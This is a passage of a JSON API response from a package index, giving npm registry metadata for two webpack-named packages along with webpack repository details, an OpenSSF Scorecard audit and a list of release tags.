/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":439,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_base420/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_base420/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_base420/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_base420/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_base420/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack_base420/codemeta","maintainers":[{"uuid":"winglau14","login":"winglau14","name":null,"email":"397069329@qq.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~winglau14","role":null,"created_at":"2022-11-15T10:40:47.016Z","updated_at":"2022-11-15T10:40:47.016Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/winglau14/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2568796,"name":"webpack-universal","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2017-07-27T18:56:12.837Z","latest_release_published_at":"2017-07-27T18:56:12.837Z","latest_release_number":"1.0.0","last_synced_at":"2026-09-03T00:17:54.691Z","created_at":"2022-04-10T03:39:22.270Z","updated_at":"2026-09-03T00:17:54.692Z","registry_url":"https://www.npmjs.com/package/webpack-universal","install_command":"npm install webpack-universal","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifest